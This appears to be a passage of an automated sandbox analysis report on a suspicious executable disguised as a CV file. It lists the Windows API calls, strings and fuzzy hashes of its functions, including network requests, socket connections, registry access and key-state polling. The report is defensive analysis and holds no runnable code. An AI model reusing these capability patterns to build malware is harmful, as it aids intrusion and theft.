                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000C1D49
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                            • API String ID: 2125237772-557222456
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011B006
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 0011B115
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011B298
                                                                                              • Part of subcall function 00109DC5: VariantInit.OLEAUT32(00000000), ref: 00109E05
                                                                                              • Part of subcall function 00109DC5: VariantCopy.OLEAUT32(?,?), ref: 00109E0E
                                                                                              • Part of subcall function 00109DC5: VariantClear.OLEAUT32(?), ref: 00109E1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                            • API String ID: 4237274167-1221869570
                                                                                            APIs
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • _memset.LIBCMT ref: 00105438
                                                                                            • GetMenuItemInfoW.USER32(?), ref: 00105467
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00105513
                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0010553D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                            • String ID: 0
                                                                                            • API String ID: 4152858687-4108050209
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0010027B
                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001002B1
                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001002C2
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00100344
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                            • String ID: DllGetClassObject
                                                                                            • API String ID: 753597075-1075368562
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00105075
                                                                                            • GetMenuItemInfoW.USER32 ref: 00105091
                                                                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001050D7
                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00181708,00000000), ref: 00105120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                            • String ID: 0
                                                                                            • API String ID: 1173514356-4108050209
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00120587
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharLower
                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                            • API String ID: 2358735015-567219261
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000FB88E
                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000FB8A1
                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 000FB8D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 3850602802-1403004172
                                                                                            APIs
                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00114401
                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00114427
                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00114457
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0011449E
                                                                                              • Part of subcall function 00115052: GetLastError.KERNEL32(?,?,001143CC,00000000,00000000,00000001), ref: 00115067
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                            • String ID:
                                                                                            • API String ID: 1951874230-3916222277
                                                                                            APIs
                                                                                              • Part of subcall function 000DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000DD1BA
                                                                                              • Part of subcall function 000DD17C: GetStockObject.GDI32(00000011), ref: 000DD1CE
                                                                                              • Part of subcall function 000DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000DD1D8
                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0012915C
                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00129163
                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00129178
                                                                                            • DestroyWindow.USER32(?), ref: 00129180
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                            • String ID: SysAnimate32
                                                                                            • API String ID: 4146253029-1011021900
                                                                                            • Opcode ID: c1c534ede1647d76927ff28e6fa06b3c832a44f2089154940e9f7b0c8a801a75
                                                                                            • Instruction ID: d2eed3cfab3ef1014ceb51549ff39b91ab1b7547d1a4969e2ee85b2d68325309
                                                                                            • Opcode Fuzzy Hash: c1c534ede1647d76927ff28e6fa06b3c832a44f2089154940e9f7b0c8a801a75
                                                                                            • Instruction Fuzzy Hash: B6219F71200216BBEF204F69EC85EBA37ADFF99374F100619F954961A0D771DC71A760
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00109588
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001095B9
                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 001095CB
                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00109605
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$FilePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 4209266947-2873401336
                                                                                            • Opcode ID: 1d873f46dead413d98cc6f23379dd83d823dd14fd4786ef5362fca25c2e74cc5
                                                                                            • Instruction ID: 2396cbbb273b1df0fa48e3e3c10cc0294936b2187c83228a2f0cbb9856d8a244
                                                                                            • Opcode Fuzzy Hash: 1d873f46dead413d98cc6f23379dd83d823dd14fd4786ef5362fca25c2e74cc5
                                                                                            • Instruction Fuzzy Hash: D6219074600305ABDB219F26DC15E9A7BF8AF56720F604A1AFCE1D72E1D7B0D940CB10
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00109653
                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00109683
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00109694
                                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001096CE
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$FilePipe
                                                                                            • String ID: nul
                                                                                            • API String ID: 4209266947-2873401336
                                                                                            • Opcode ID: 73b1808f21b987782a4b39d5195a8354ec39449beee3978274380381dccf27b8
                                                                                            • Instruction ID: d6e92f765dcb29333b133dea281936928118d9b4046fc5ad85b3e9d7cfcfe3fc
                                                                                            • Opcode Fuzzy Hash: 73b1808f21b987782a4b39d5195a8354ec39449beee3978274380381dccf27b8
                                                                                            • Instruction Fuzzy Hash: 132183756002059BDB209F69DC64E9A77E8AF55734F200A19FCE1D72D1D7F1D881CB50
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010DB0A
                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0010DB5E
                                                                                            • __swprintf.LIBCMT ref: 0010DB77
                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0015DC00), ref: 0010DBB5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                            • String ID: %lu
                                                                                            • API String ID: 3164766367-685833217
                                                                                            • Opcode ID: 496d5baa878072ea70104000de2d01e45e6ec3e733da185b1924f03980242088
                                                                                            • Instruction ID: 70f48179e67253ed3f2254e11b791c9eb6175118cef72c8e71b31adb56e1ba50
                                                                                            • Opcode Fuzzy Hash: 496d5baa878072ea70104000de2d01e45e6ec3e733da185b1924f03980242088
                                                                                            • Instruction Fuzzy Hash: 2321AA35600148AFCB10EF95DD85EEEBBB8EF49704B014069F509E7261DB70EE41CB61
                                                                                            APIs
                                                                                              • Part of subcall function 000FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000FC84A
                                                                                              • Part of subcall function 000FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000FC85D
                                                                                              • Part of subcall function 000FC82D: GetCurrentThreadId.KERNEL32 ref: 000FC864
                                                                                              • Part of subcall function 000FC82D: AttachThreadInput.USER32(00000000), ref: 000FC86B
                                                                                            • GetFocus.USER32 ref: 000FCA05
                                                                                              • Part of subcall function 000FC876: GetParent.USER32(?), ref: 000FC884
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FCA4E
                                                                                            • EnumChildWindows.USER32(?,000FCAC4), ref: 000FCA76
                                                                                            • __swprintf.LIBCMT ref: 000FCA90
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                            • String ID: %s%d
                                                                                            • API String ID: 3187004680-1110647743
                                                                                            • Opcode ID: 39d284ebb3ac8d5a5c3358d24f320e5d437aa0712c0dc7bdc44d62729fec7062
                                                                                            • Instruction ID: e4bc7b1b31f866f2c40ee991c715031669abc1484e32a119edd76cdd8b6533d8
                                                                                            • Opcode Fuzzy Hash: 39d284ebb3ac8d5a5c3358d24f320e5d437aa0712c0dc7bdc44d62729fec7062
                                                                                            • Instruction Fuzzy Hash: CE116D7560020D6ADF11BFA09D86FFD3768AB45714F04806AFF09AA183DB709946EB71
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001219F3
                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00121A26
                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00121B49
                                                                                            • CloseHandle.KERNEL32(?), ref: 00121BBF
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                            • String ID:
                                                                                            • API String ID: 2364364464-0
                                                                                            • Opcode ID: 95d0e4618b7187a58de1887b5f8eb8ee5229ce3836124c814e3397748dd5bf56
                                                                                            • Instruction ID: 5e5ccfe9d269e43ab75fd4d6fb32baff7e9f4dca571f433a410bf4b3bf2285f8
                                                                                            • Opcode Fuzzy Hash: 95d0e4618b7187a58de1887b5f8eb8ee5229ce3836124c814e3397748dd5bf56
                                                                                            • Instruction Fuzzy Hash: 55817F74600314ABDF10EF64D886BADBBF5AF18720F14845AF905AF382DBB4AD418F90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0012E1D5
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012E20D
                                                                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0012E248
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0012E269
                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0012E281
                                                                                            Similarity
                                                                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3188977179-0
                                                                                            • Opcode ID: 88ebc7c68848c71a125d93c6b2b4708cf42143c29cb801d248a55650467826b3
                                                                                            • Instruction ID: c1c9f078ea949b499436dcc75180b45f3f481cf2c8c37fa379c6afc584e2e363
                                                                                            • Opcode Fuzzy Hash: 88ebc7c68848c71a125d93c6b2b4708cf42143c29cb801d248a55650467826b3
                                                                                            • Instruction Fuzzy Hash: 8F61BE35A00224AFDB24DF58E894FEA77FAAB4A300F154069F899973A1D771A961CB10
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 00101CB4
                                                                                            • VariantClear.OLEAUT32(00000013), ref: 00101D26
                                                                                            • VariantClear.OLEAUT32(00000000), ref: 00101D81
                                                                                            • VariantClear.OLEAUT32(?), ref: 00101DF8
                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00101E26
                                                                                            Similarity
                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                            • String ID:
                                                                                            • API String ID: 4136290138-0
                                                                                            • Opcode ID: bd060a3d2db2e57873bc50cc155843a45f4700b6ea5670758ed9606b3f0fd32e
                                                                                            • Instruction ID: d21e64e1ecaf4335d3633f616205864e5607b150bba1a2db5936ea342ddb06a2
                                                                                            • Opcode Fuzzy Hash: bd060a3d2db2e57873bc50cc155843a45f4700b6ea5670758ed9606b3f0fd32e
                                                                                            • Instruction Fuzzy Hash: 6D5169B5A00209EFCB14CF58C884AAAB7B8FF4D314B158559ED49DB350E374EA51CFA0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001206EE
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0012077D
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0012079B
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001207E1
                                                                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 001207FB
                                                                                              • Part of subcall function 000DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0010A574,?,?,00000000,00000008), ref: 000DE675
                                                                                              • Part of subcall function 000DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0010A574,?,?,00000000,00000008), ref: 000DE699
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 327935632-0
                                                                                            • Opcode ID: 535cd51906fc56a69d38b543f95f66d3f27908469bcab406f9901e1a1694c6b0
                                                                                            • Instruction ID: e9c7a868be5ab94092dd94f0e76d856ef8aa0d9ba9d6f589793ee3280f65f8e2
                                                                                            • Opcode Fuzzy Hash: 535cd51906fc56a69d38b543f95f66d3f27908469bcab406f9901e1a1694c6b0
                                                                                            • Instruction Fuzzy Hash: 35516776A00215DFCB01EFA8D885EEDB7B5BF5D310B04816AE945AB362DB30ED41CB90
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00122EEF
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00122F2E
                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00122F75
                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00122FA1
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00122FAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                            APIs
                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001112B4
                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001112DD
                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0011131C
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00111341
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00111349
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                            • ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            Similarity
                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FB369
                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 000FB413
                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000FB41B
                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 000FB429
                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000FB431
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 000FDBD7
                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000FDBF4
                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000FDC2C
                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000FDC52
                                                                                            • _wcsstr.LIBCMT ref: 000FDC5C
                                                                                            Similarity
                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000FBC90
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000FBCC2
                                                                                            • __itow.LIBCMT ref: 000FBCDA
                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000FBD00
                                                                                            • __itow.LIBCMT ref: 000FBD11
                                                                                            Similarity
                                                                                            • API ID: MessageSend$__itow
                                                                                            APIs
                                                                                              • Part of subcall function 000C50E6: _wcsncpy.LIBCMT ref: 000C50FA
                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,001060C3), ref: 00106369
                                                                                            • GetLastError.KERNEL32(?,?,?,001060C3), ref: 00106374
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001060C3), ref: 00106388
                                                                                            • _wcsrchr.LIBCMT ref: 001063AA
                                                                                              • Part of subcall function 00106318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,001060C3), ref: 001063E0
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                            APIs
                                                                                              • Part of subcall function 0011A82C: inet_addr.WSOCK32(00000000), ref: 0011A84E
                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00118BD3
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00118BE2
                                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00118BFE
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnectinet_addrsocket
                                                                                            APIs
                                                                                            • IsWindow.USER32(00000000), ref: 00118441
                                                                                            • GetForegroundWindow.USER32 ref: 00118458
                                                                                            • GetDC.USER32(00000000), ref: 00118494
                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 001184A0
                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 001184DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                            • String ID:
                                                                                            • API String ID: 4156661090-0
                                                                                            APIs
                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                            • BeginPath.GDI32(?), ref: 000DB009
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            APIs
                                                                                            • __calloc_crt.LIBCMT ref: 000E21A9
                                                                                            • CreateThread.KERNEL32(?,?,000E22DF,00000000,?,?), ref: 000E21ED
                                                                                            • GetLastError.KERNEL32 ref: 000E21F7
                                                                                            • _free.LIBCMT ref: 000E2200
                                                                                            • __dosmaperr.LIBCMT ref: 000E220B
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                            • String ID:
                                                                                            • API String ID: 2664167353-0
                                                                                            APIs
                                                                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000FABD7
                                                                                            • GetLastError.KERNEL32(?,000FA69F,?,?,?), ref: 000FABE1
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,000FA69F,?,?,?), ref: 000FABF0
